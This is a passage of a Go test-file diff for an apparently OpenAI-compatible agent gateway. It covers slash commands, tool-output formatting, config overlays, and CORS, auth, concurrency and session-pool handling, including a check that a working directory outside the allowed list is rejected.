+	body := `{"messages":[{"role":"user","content":"/help"}],"stream":false}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d, body = %s", w.Code, w.Body.String())
+	}
+	var resp ChatCompletionResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.XCommand != "/help" {
+		t.Errorf("x_command = %q, want /help", resp.XCommand)
+	}
+	if len(resp.Choices) == 0 || resp.Choices[0].Message == nil {
+		t.Fatal("missing choice")
+	}
+	if !strings.Contains(resp.Choices[0].Message.Content, "/clear") {
+		t.Error("help output should mention /clear")
+	}
+}
+
+func TestChatHandler_SlashClear(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	body := `{"messages":[{"role":"user","content":"/clear"}],"stream":false,"x_session_id":"test-sess"}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d, body = %s", w.Code, w.Body.String())
+	}
+	var resp ChatCompletionResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.XCommand != "/clear" {
+		t.Errorf("x_command = %q, want /clear", resp.XCommand)
+	}
+	if !strings.Contains(resp.Choices[0].Message.Content, "Conversation cleared") {
+		t.Errorf("expected clear confirmation, got %q", resp.Choices[0].Message.Content)
+	}
+}
+
+func TestChatHandler_SlashMode(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	body := `{"messages":[{"role":"user","content":"/mode plan"}],"stream":false,"x_session_id":"mode-sess"}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d", w.Code)
+	}
+	var resp ChatCompletionResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if !strings.Contains(resp.Choices[0].Message.Content, "PLAN") {
+		t.Errorf("expected PLAN in response, got %q", resp.Choices[0].Message.Content)
+	}
+}
+
+func TestChatHandler_EmptyMessages(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	body := `{"messages":[]}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusBadRequest {
+		t.Errorf("status = %d, want 400", w.Code)
+	}
+}
+
+func TestChatHandler_InvalidJSON(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader("{invalid"))
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusBadRequest {
+		t.Errorf("status = %d, want 400", w.Code)
+	}
+}
+
+func TestChatHandler_WorkDirForbidden(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	// Set restrictive allowedWorkDirs
+	allowed := []string{"/opt/allowed"}
+	srv.cfg.AllowedWorkDirs = &allowed
+
+	body := `{"messages":[{"role":"user","content":"hi"}],"x_working_dir":"/etc/evil"}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusForbidden {
+		t.Errorf("status = %d, want 403", w.Code)
+	}
+}
+
+// --- Commands tests ---
+
+func TestCommands_UnknownCommand(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.handleCommand(nil, "/foobar")
+	if result == nil {
+		t.Fatal("expected result for unknown command")
+	}
+	if !result.Error {
+		t.Error("expected error=true for unknown command")
+	}
+}
+
+func TestCommands_NotACommand(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.handleCommand(nil, "hello world")
+	if result != nil {
+		t.Error("non-command should return nil")
+	}
+}
+
+func TestCommands_Status(t *testing.T) {
+	srv := newTestServer(t)
+	sess := &GatewaySession{ID: "test-sess", WorkDir: "/tmp", Mode: "agent"}
+	result := srv.cmdStatus(sess)
+	if result == nil {
+		t.Fatal("expected result")
+	}
+	if !strings.Contains(result.Message, "AGENT") {
+		t.Errorf("status should show mode, got %q", result.Message)
+	}
+	if !strings.Contains(result.Message, "test-sess") {
+		t.Errorf("status should show session ID, got %q", result.Message)
+	}
+}
+
+func TestCommands_CompactNoSession(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdCompact(nil)
+	if result == nil {
+		t.Fatal("expected result")
+	}
+	if !result.Error {
+		t.Error("expected error for nil session")
+	}
+}
+
+func TestCommands_CompactTooShort(t *testing.T) {
+	srv := newTestServer(t)
+	// Create a session with less than 2 messages
+	sess := &GatewaySession{ID: "test-sess", WorkDir: "/tmp"}
+	mgr := session.New(t.TempDir(), t.TempDir())
+	mgr.Init()
+	sess.Manager = mgr
+	result := srv.cmdCompact(sess)
+	if result == nil {
+		t.Fatal("expected result")
+	}
+	if !result.Error {
+		t.Error("expected error for too-short conversation")
+	}
+	if !strings.Contains(result.Message, "too short") {
+		t.Errorf("expected 'too short' message, got %q", result.Message)
+	}
+}
+
+func TestCommands_CompactSetsFlag(t *testing.T) {
+	srv := newTestServer(t)
+	sess := &GatewaySession{ID: "test-sess", WorkDir: t.TempDir()}
+	mgr := session.New(sess.WorkDir, t.TempDir())
+	mgr.Init()
+	// Append 2 messages so conversation is long enough
+	mgr.AppendMessage(provider.NewUserMessage("hello"))
+	mgr.AppendMessage(provider.NewAssistantMessage([]provider.ContentBlock{{Type: "text", Text: "hi"}}))
+	sess.Manager = mgr
+
+	result := srv.cmdCompact(sess)
+	if result == nil {
+		t.Fatal("expected result")
+	}
+	if result.Error {
+		t.Errorf("unexpected error: %s", result.Message)
+	}
+	if !sess.ForceCompact {
+		t.Error("expected ForceCompact to be set")
+	}
+	if !strings.Contains(result.Message, "compaction") {
+		t.Errorf("expected compaction confirmation, got %q", result.Message)
+	}
+}
+
+func TestChatHandler_SlashCompact(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	body := `{"messages":[{"role":"user","content":"/compact"}],"stream":false,"x_session_id":"compact-sess"}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d, body = %s", w.Code, w.Body.String())
+	}
+	var resp ChatCompletionResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.XCommand != "/compact" {
+		t.Errorf("x_command = %q, want /compact", resp.XCommand)
+	}
+}
+
+// --- Tool format tests ---
+
+func TestFormatToolExpanded_Read(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "read",
+		Args:   map[string]any{"path": "main.go"},
+		Status: "completed",
+		Result: "package main\n\nfunc main() {}\n",
+	}
+	text := formatToolExpanded(tc)
+	// Markdown header
+	if !strings.Contains(text, "🔧 read: main.go") {
+		t.Errorf("missing markdown header: %s", text)
+	}
+	// Code fence with language
+	if !strings.Contains(text, "```go\n") {
+		t.Errorf("missing go code fence: %s", text)
+	}
+	if !strings.Contains(text, "package main") {
+		t.Errorf("missing result content: %s", text)
+	}
+	// Closing fence
+	if !strings.Contains(text, "\n```") {
+		t.Errorf("missing closing fence: %s", text)
+	}
+}
+
+func TestFormatToolExpanded_Bash(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "bash",
+		Args:   map[string]any{"command": "go test ./..."},
+		Status: "completed",
+		Result: "ok  pkg 0.5s\n",
+	}
+	text := formatToolExpanded(tc)
+	if !strings.Contains(text, "🔧 bash: go test ./...") {
+		t.Errorf("missing markdown header: %s", text)
+	}
+	if !strings.Contains(text, "```bash\n") {
+		t.Errorf("missing bash code fence: %s", text)
+	}
+	if !strings.Contains(text, "ok  pkg") {
+		t.Errorf("missing stdout: %s", text)
+	}
+}
+
+func TestFormatToolExpanded_EditWithDiff(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "edit",
+		Args:   map[string]any{"path": "main.go"},
+		Status: "completed",
+		Diff:   &tools.FileDiff{Path: "main.go", Added: 2, Deleted: 1, Unified: "+func new1() {}\n-func old() {}\n"},
+	}
+	text := formatToolExpanded(tc)
+	if !strings.Contains(text, "```diff\n") {
+		t.Errorf("missing diff code fence: %s", text)
+	}
+	if !strings.Contains(text, "+func new1") {
+		t.Errorf("missing diff content: %s", text)
+	}
+}
+
+func TestFormatToolExpanded_Error(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "bash",
+		Args:   map[string]any{"command": "false"},
+		Status: "failed",
+		Error:  fmt.Errorf("exit code 1"),
+	}
+	text := formatToolExpanded(tc)
+	if !strings.Contains(text, "Error: exit code 1") {
+		t.Errorf("missing error: %s", text)
+	}
+}
+
+func TestFormatToolExpanded_ReadJSON(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "read",
+		Args:   map[string]any{"path": "package.json"},
+		Status: "completed",
+		Result: `{"name": "test"}`,
+	}
+	text := formatToolExpanded(tc)
+	if !strings.Contains(text, "```json\n") {
+		t.Errorf("should use json fence for .json file: %s", text)
+	}
+}
+
+func TestFormatToolExpanded_GrepPlain(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "grep",
+		Args:   map[string]any{"pattern": "TODO", "path": "./src"},
+		Status: "completed",
+		Result: "src/main.go:10: // TODO fix this\n",
+	}
+	text := formatToolExpanded(tc)
+	// grep should use plain text fence (no language)
+	if !strings.Contains(text, "```\n") {
+		t.Errorf("grep should use plain code fence: %s", text)
+	}
+}
+
+func TestFormatToolRunning(t *testing.T) {
+	text := formatToolRunning("read", map[string]any{"path": "main.go"})
+	if !strings.Contains(text, "\u23f3") {
+		t.Errorf("missing hourglass: %s", text)
+	}
+	if !strings.Contains(text, "read") {
+		t.Errorf("missing tool name: %s", text)
+	}
+}
+
+func TestInferCodeLang(t *testing.T) {
+	tests := []struct {
+		tool string
+		args map[string]any
+		want string
+	}{
+		{"bash", nil, "bash"},
+		{"read", map[string]any{"path": "main.go"}, "go"},
+		{"read", map[string]any{"path": "app.py"}, "python"},
+		{"read", map[string]any{"path": "style.css"}, "css"},
+		{"read", map[string]any{"path": "Makefile"}, "makefile"},
+		{"read", map[string]any{"path": "Dockerfile"}, "dockerfile"},
+		{"read", map[string]any{"path": "data.json"}, "json"},
+		{"grep", map[string]any{"pattern": "x"}, ""},
+		{"ls", nil, ""},
+	}
+	for _, tt := range tests {
+		got := inferCodeLang(tt.tool, tt.args)
+		if got != tt.want {
+			t.Errorf("inferCodeLang(%q, %v) = %q, want %q", tt.tool, tt.args, got, tt.want)
+		}
+	}
+}
+
+func TestToolKeyArg(t *testing.T) {
+	tests := []struct {
+		name string
+		tool string
+		args map[string]any
+		want string
+	}{
+		{"read path", "read", map[string]any{"path": "main.go"}, "main.go"},
+		{"bash command", "bash", map[string]any{"command": "ls -la"}, "ls -la"},
+		{"grep", "grep", map[string]any{"pattern": "TODO", "path": "src/"}, "TODO src/"},
+		{"nil args", "read", nil, ""},
+		{"unknown tool", "foo", map[string]any{"name": "bar"}, "bar"},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got := toolKeyArg(tt.tool, tt.args)
+			if got != tt.want {
+				t.Errorf("toolKeyArg(%q) = %q, want %q", tt.tool, got, tt.want)
+			}
+		})
+	}
+}
+
+func TestChatHandler_SlashHelp_Streaming(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	body := `{"messages":[{"role":"user","content":"/help"}],"stream":true}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d, body = %s", w.Code, w.Body.String())
+	}
+	resBody := w.Body.String()
+	if !strings.Contains(resBody, "data: ") {
+		t.Error("streaming response should contain SSE data lines")
+	}
+	if !strings.Contains(resBody, "[DONE]") {
+		t.Error("streaming response should end with [DONE]")
+	}
+	if !strings.Contains(resBody, "/clear") {
+		t.Error("help content should mention /clear")
+	}
+	ct := w.Header().Get("Content-Type")
+	if !strings.Contains(ct, "text/event-stream") {
+		t.Errorf("Content-Type = %q, want text/event-stream", ct)
+	}
+}
+
+// --- Collapsed mode tests ---
+
+func TestFormatToolCollapsed_Read(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "read",
+		Args:   map[string]any{"path": "main.go"},
+		Status: "completed",
+		Result: "package main\n\nfunc main() {}\n",
+	}
+	text := formatToolCollapsed(tc)
+	if !strings.Contains(text, "read") {
+		t.Errorf("missing tool name: %s", text)
+	}
+	if !strings.Contains(text, "main.go") {
+		t.Errorf("missing path: %s", text)
+	}
+	if !strings.Contains(text, "✅") {
+		t.Errorf("missing success marker: %s", text)
+	}
+	// Should NOT contain the file content
+	if strings.Contains(text, "package main") {
+		t.Errorf("collapsed should not contain file content: %s", text)
+	}
+	if strings.Contains(text, "```") {
+		t.Errorf("collapsed should not contain code fences: %s", text)
+	}
+}
+
+func TestFormatToolCollapsed_EditShowsDiff(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "edit",
+		Args:   map[string]any{"path": "main.go"},
+		Status: "completed",
+		Diff:   &tools.FileDiff{Path: "main.go", Added: 1, Deleted: 1, Unified: "+new line\n-old line\n"},
+	}
+	text := formatToolCollapsed(tc)
+	// edit with diff should always show the diff even in collapsed mode
+	if !strings.Contains(text, "```diff") {
+		t.Errorf("collapsed edit should show diff fence: %s", text)
+	}
+	if !strings.Contains(text, "+new line") {
+		t.Errorf("collapsed edit should show diff content: %s", text)
+	}
+}
+
+func TestFormatToolCollapsed_ErrorAlwaysShown(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "bash",
+		Args:   map[string]any{"command": "false"},
+		Status: "failed",
+		Error:  fmt.Errorf("exit code 1"),
+	}
+	text := formatToolCollapsed(tc)
+	if !strings.Contains(text, "Error: exit code 1") {
+		t.Errorf("collapsed error should always show: %s", text)
+	}
+}
+
+func TestFormatToolCollapsed_BashNoOutput(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "bash",
+		Args:   map[string]any{"command": "go test ./..."},
+		Status: "completed",
+		Result: "ok  pkg 0.5s\n",
+	}
+	text := formatToolCollapsed(tc)
+	if !strings.Contains(text, "✅") {
+		t.Errorf("missing success marker: %s", text)
+	}
+	if strings.Contains(text, "ok  pkg") {
+		t.Errorf("collapsed bash should not show stdout: %s", text)
+	}
+}
+
+// --- Dispatcher test ---
+
+func TestFormatToolResult_Dispatches(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "read",
+		Args:   map[string]any{"path": "main.go"},
+		Status: "completed",
+		Result: "package main\n",
+	}
+
+	collapsed := formatToolResult(tc, "collapsed")
+	expanded := formatToolResult(tc, "expanded")
+
+	if strings.Contains(collapsed, "```go") {
+		t.Error("collapsed should not have code fence")
+	}
+	if !strings.Contains(expanded, "```go") {
+		t.Error("expanded should have code fence")
+	}
+}
+
+// --- Project-level config test ---
+
+func TestLoadGatewayConfig_ProjectOverlay(t *testing.T) {
+	dir := t.TempDir()
+
+	// Create global config
+	globalDir := filepath.Join(dir, "global")
+	globalPath := filepath.Join(globalDir, "gateway.json")
+	globalCfg := DefaultGatewayConfig()
+	globalCfg.Listen = ":9090"
+	globalCfg.DefaultMode = "agent"
+	SaveGatewayConfig(globalPath, globalCfg)
+
+	// Create project config that overrides some fields
+	projectDir := filepath.Join(dir, "project", ".vibe")
+	os.MkdirAll(projectDir, 0755)
+	projectPath := filepath.Join(projectDir, "gateway.json")
+	os.WriteFile(projectPath, []byte(`{"defaultMode":"yolo","toolVisibility":{"detail":"expanded"}}`), 0644)
+
+	// Load global
+	cfg, err := LoadGatewayConfigFrom(globalPath)
+	if err != nil {
+		t.Fatalf("load: %v", err)
+	}
+	if cfg.DefaultMode != "agent" {
+		t.Errorf("global mode = %q", cfg.DefaultMode)
+	}
+
+	// Overlay project (simulating what LoadGatewayConfig does)
+	data, _ := os.ReadFile(projectPath)
+	json.Unmarshal(data, cfg)
+	normalizeConfig(cfg)
+
+	if cfg.DefaultMode != "yolo" {
+		t.Errorf("project should override mode to yolo, got %q", cfg.DefaultMode)
+	}
+	if cfg.Listen != ":9090" {
+		t.Errorf("listen should be preserved from global, got %q", cfg.Listen)
+	}
+	if cfg.ToolVisibility.Detail != "expanded" {
+		t.Errorf("detail should be overridden to expanded, got %q", cfg.ToolVisibility.Detail)
+	}
+}
+
+func TestToolVisibility_DefaultDetail(t *testing.T) {
+	cfg := DefaultGatewayConfig()
+	if cfg.GetToolDetail() != "collapsed" {
+		t.Errorf("default detail = %q, want collapsed", cfg.GetToolDetail())
+	}
+}
+
+// --- CORS middleware disabled test ---
+
+func TestCORSMiddleware_Disabled(t *testing.T) {
+	inner := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	})
+	handler := CORSMiddleware(CORSConfig{Enabled: false}, inner)
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+	// CORS headers should NOT be set
+	if got := w.Header().Get("Access-Control-Allow-Origin"); got != "" {
+		t.Errorf("CORS origin should be empty, got %q", got)
+	}
+}
+
+func TestCORSMiddleware_DefaultOrigins(t *testing.T) {
+	handler := CORSMiddleware(CORSConfig{Enabled: true}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if got := w.Header().Get("Access-Control-Allow-Origin"); got != "*" {
+		t.Errorf("CORS origin = %q, want *", got)
+	}
+}
+
+func TestGatewaySecurityWarning(t *testing.T) {
+	cfg := DefaultGatewayConfig()
+	cfg.Listen = ":8080"
+	cfg.DefaultMode = "yolo"
+	cfg.Auth.Enabled = false
+	if got := gatewaySecurityWarning(cfg); got == "" {
+		t.Fatal("expected warning for public yolo gateway without auth")
+	}
+
+	cfg.Listen = "127.0.0.1:8080"
+	if got := gatewaySecurityWarning(cfg); got != "" {
+		t.Fatalf("warning for loopback = %q, want empty", got)
+	}
+
+	cfg.Listen = ":8080"
+	cfg.Auth.Enabled = true
+	if got := gatewaySecurityWarning(cfg); got != "" {
+		t.Fatalf("warning with auth = %q, want empty", got)
+	}
+}
+
+// --- Concurrency middleware at capacity test ---
+
+func TestConcurrencyMiddleware_AtCapacity(t *testing.T) {
+	blocking := make(chan struct{})
+	inner := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		<-blocking // block until released
+		w.WriteHeader(http.StatusOK)
+	})
+	handler := ConcurrencyMiddleware(1, inner)
+
+	// Fill the single slot
+	go func() {
+		req := httptest.NewRequest("GET", "/test", nil)
+		w := httptest.NewRecorder()
+		handler.ServeHTTP(w, req)
+	}()
+
+	// Give goroutine time to start
+	time.Sleep(20 * time.Millisecond)
+
+	// Second request should be rejected
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusTooManyRequests {
+		t.Errorf("status = %d, want 429", w.Code)
+	}
+
+	// Release the blocking goroutine
+	close(blocking)
+}
+
+// --- Auth with non-Bearer prefix ---
+
+func TestAuthMiddleware_NonBearerPrefix(t *testing.T) {
+	handler := AuthMiddleware(AuthConfig{Enabled: true, Tokens: []string{"sk-test"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Authorization", "Basic dXNlcjpwYXNz")
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("status = %d, want 401", w.Code)
+	}
+}
+
+// --- extractBearerToken tests ---
+
+func TestExtractBearerToken(t *testing.T) {
+	tests := []struct {
+		name string
+		auth string
+		want string
+	}{
+		{"empty", "", ""},
+		{"bearer", "Bearer sk-test", "sk-test"},
+		{"bearer with spaces", "Bearer  sk-test ", "sk-test"},
+		{"basic", "Basic dXNlcjpwYXNz", ""},
+		{"no prefix", "sk-test", ""},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			req := httptest.NewRequest("GET", "/", nil)
+			if tt.auth != "" {
+				req.Header.Set("Authorization", tt.auth)
+			}
+			got := extractBearerToken(req)
+			if got != tt.want {
+				t.Errorf("extractBearerToken(%q) = %q, want %q", tt.auth, got, tt.want)
+			}
+		})
+	}
+}
+
+// --- SessionPool advanced tests ---
+
+func TestSessionPool_ReplaceSameID(t *testing.T) {
+	pool := NewSessionPool(1, 0)
+	defer pool.Stop()
+
+	sess1 := &GatewaySession{ID: "sess-1", WorkDir: "/tmp/a", LastUsed: time.Now()}
+	if err := pool.Put(sess1); err != nil {
+		t.Fatalf("put 1: %v", err)
+	}
+
+	// Replace same ID should succeed even at max capacity
+	sess1v2 := &GatewaySession{ID: "sess-1", WorkDir: "/tmp/b", LastUsed: time.Now()}
+	if err := pool.Put(sess1v2); err != nil {
+		t.Fatalf("replace same ID should succeed: %v", err)
+	}
+
+	got := pool.Get("sess-1")
+	if got.WorkDir != "/tmp/b" {
+		t.Errorf("workdir = %q, want /tmp/b", got.WorkDir)
+	}
+}
+
+func TestSessionPool_EvictIdle(t *testing.T) {
+	pool := NewSessionPool(0, 50*time.Millisecond)
+	defer pool.Stop()
+
+	sess := &GatewaySession{ID: "sess-1", LastUsed: time.Now()}
+	pool.Put(sess)
+	// Manually backdate LastUsed after Put (which calls Touch)
+	sess.LastUsed = time.Now().Add(-time.Hour)
+
+	pool.evictIdle()
+
+	if pool.Get("sess-1") != nil {
+		t.Error("idle session should be evicted")
+	}
+}
+
+func TestSessionPool_EvictIdleKeepsFresh(t *testing.T) {
+	pool := NewSessionPool(0, time.Hour)
+	defer pool.Stop()
+
+	sess := &GatewaySession{ID: "sess-1", LastUsed: time.Now()}
+	pool.Put(sess)
+
+	pool.evictIdle()
+
+	if pool.Get("sess-1") == nil {
+		t.Error("fresh session should not be evicted")
+	}
+}
+
+func TestPoolFullError_Error(t *testing.T) {
+	e := &PoolFullError{Max: 5}
+	if e.Error() != "session pool is at capacity" {
+		t.Errorf("error = %q", e.Error())
+	}
+}
+
+// --- parseMessages advanced tests ---
+
+func TestParseMessages_MultipleSystem(t *testing.T) {
+	msgs := []RequestMessage{
+		{Role: "system", Content: "sys1"},
+		{Role: "system", Content: "sys2"},
+		{Role: "user", Content: "hello"},
+	}
+	lastUser, sysMsgs, history := parseMessages(msgs)
+	if lastUser != "hello" {
+		t.Errorf("lastUser = %q", lastUser)
+	}
+	if len(sysMsgs) != 2 {
+		t.Errorf("sysMsgs len = %d, want 2", len(sysMsgs))
+	}
+	if len(history) != 0 {
+		t.Errorf("history len = %d, want 0", len(history))
+	}
+}
+
+func TestParseMessages_SingleUser(t *testing.T) {
+	msgs := []RequestMessage{
+		{Role: "user", Content: "only message"},
+	}
+	lastUser, sysMsgs, history := parseMessages(msgs)
+	if lastUser != "only message" {
+		t.Errorf("lastUser = %q", lastUser)
+	}
+	if len(sysMsgs) != 0 {
+		t.Errorf("sysMsgs len = %d", len(sysMsgs))
+	}
+	if len(history) != 0 {
+		t.Errorf("history len = %d", len(history))
+	}
+}
+
+// --- convertHistoryMessages tests ---
+
+func TestConvertHistoryMessages(t *testing.T) {
+	msgs := []RequestMessage{
+		{Role: "user", Content: "hello"},
+		{Role: "assistant", Content: "hi"},
+		{Role: "system", Content: "ignored"},
+	}
+	result := convertHistoryMessages(msgs)
+	if len(result) != 2 {
+		t.Fatalf("result len = %d, want 2", len(result))
+	}
+	if result[0].Role != "user" {
+		t.Errorf("result[0].Role = %q", result[0].Role)
+	}
+	if result[1].Role != "assistant" {
+		t.Errorf("result[1].Role = %q", result[1].Role)
+	}
+}
+
+func TestConvertHistoryMessages_Empty(t *testing.T) {
+	result := convertHistoryMessages(nil)
+	if len(result) != 0 {
+		t.Errorf("result len = %d, want 0", len(result))
+	}
+}
+
+// --- resolveToolEvent tests ---
+
+func TestResolveToolEvent_FromTopLevel(t *testing.T) {
+	ev := agent.Event{
+		ToolName:   "read",
+		ToolCallID: "call-1",
+	}
+	name, callID := resolveToolEvent(ev)
+	if name != "read" {
+		t.Errorf("name = %q", name)
+	}
+	if callID != "call-1" {
+		t.Errorf("callID = %q", callID)
+	}
+}
+
+func TestResolveToolEvent_FallbackToToolCall(t *testing.T) {
+	ev := agent.Event{
+		ToolCall: &provider.ToolCallBlock{
+			ID:   "call-2",
+			Name: "bash",
+		},
+	}
+	name, callID := resolveToolEvent(ev)
+	if name != "bash" {
+		t.Errorf("name = %q", name)
+	}
+	if callID != "call-2" {
+		t.Errorf("callID = %q", callID)
+	}
+}
+
+func TestResolveToolEvent_TopLevelTakesPrecedence(t *testing.T) {
+	ev := agent.Event{
+		ToolName:   "read",
+		ToolCallID: "call-1",
+		ToolCall: &provider.ToolCallBlock{
+			ID:   "call-2",
+			Name: "bash",
+		},
+	}
+	name, callID := resolveToolEvent(ev)
+	if name != "read" {
+		t.Errorf("name = %q, want read", name)
+	}
+	if callID != "call-1" {
+		t.Errorf("callID = %q, want call-1", callID)
+	}
+}
+
+// --- Commands: mode/model/sessions edge cases ---
+
+func TestCommands_ModeInvalid(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdMode(nil, []string{"/mode", "invalid"})
+	if !result.Error {
+		t.Error("expected error for invalid mode")
+	}
+}
+
+func TestCommands_ModeShowCurrent(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdMode(nil, []string{"/mode"})
+	if result.Error {
+		t.Error("unexpected error")
+	}
+	if !strings.Contains(result.Message, "YOLO") {
+		t.Errorf("expected current mode YOLO, got %q", result.Message)
+	}
+}
+
+func TestCommands_ModeShowSessionOverride(t *testing.T) {
+	srv := newTestServer(t)
+	sess := &GatewaySession{ID: "s1", Mode: "plan"}
+	result := srv.cmdMode(sess, []string{"/mode"})
+	if !strings.Contains(result.Message, "PLAN") {
+		t.Errorf("expected PLAN, got %q", result.Message)
+	}
+}
+
+func TestCommands_ModelNotFound(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdModel([]string{"/model", "nonexistent"})
+	if !result.Error {
+		t.Error("expected error for unknown model")
+	}
+}
+
+func TestCommands_ModelShowCurrent(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdModel([]string{"/model"})
+	if result.Error {
+		t.Error("unexpected error")
+	}
+	if !strings.Contains(result.Message, "Model 1") {
+		t.Errorf("expected Model 1, got %q", result.Message)
+	}
+}
+
+func TestCommands_SessionsList(t *testing.T) {
+	srv := newTestServer(t)
+	srv.pool.Put(&GatewaySession{ID: "s1", LastUsed: time.Now()})
+	srv.pool.Put(&GatewaySession{ID: "s2", LastUsed: time.Now()})
+
+	result := srv.cmdSessions([]string{"/sessions"})
+	if result.Error {
+		t.Error("unexpected error")
+	}
+	if !strings.Contains(result.Message, "s1") || !strings.Contains(result.Message, "s2") {
+		t.Errorf("expected both session IDs, got %q", result.Message)
+	}
+}
+
+func TestCommands_SessionsEmpty(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdSessions([]string{"/sessions"})
+	if !strings.Contains(result.Message, "No active sessions") {
+		t.Errorf("expected no sessions message, got %q", result.Message)
+	}
+}
+
+func TestCommands_SessionsDelete(t *testing.T) {
+	srv := newTestServer(t)
+	srv.pool.Put(&GatewaySession{ID: "s1", LastUsed: time.Now()})
+	result := srv.cmdSessions([]string{"/sessions", "del", "s1"})
+	if result.Error {
+		t.Error("unexpected error")
+	}
+	if srv.pool.Get("s1") != nil {
+		t.Error("session should be deleted")
+	}
+}
+
+func TestCommands_SessionsDeleteNotFound(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdSessions([]string{"/sessions", "del", "nonexistent"})
+	if !result.Error {
+		t.Error("expected error for missing session")
+	}
+}
+
+func TestCommands_SessionsDeleteMissingID(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdSessions([]string{"/sessions", "del"})
+	if !result.Error {
+		t.Error("expected error for missing ID")
+	}
+}
+
+func TestCommands_SessionsUnknownSubcmd(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdSessions([]string{"/sessions", "badcmd"})
+	if !result.Error {
+		t.Error("expected error for unknown subcmd")
+	}
+}
+
+func TestCommands_StatusNoSession(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdStatus(nil)
+	if !result.Error {
+		t.Error("expected error for nil session")
+	}
+}
+
+func TestCommands_SkillNoManager(t *testing.T) {
+	srv := newTestServer(t)
+	srv.skillsMgr = nil
+	result := srv.cmdSkill([]string{"/skill", "test"})
+	if !result.Error {
+		t.Error("expected error when no skills manager")
+	}
+}
+
+func TestCommands_SkillNotFound(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdSkill([]string{"/skill", "nonexistent"})
+	if !result.Error {
+		t.Error("expected error for unknown skill")
+	}
+}
+
+func TestCommands_SkillsEmpty(t *testing.T) {
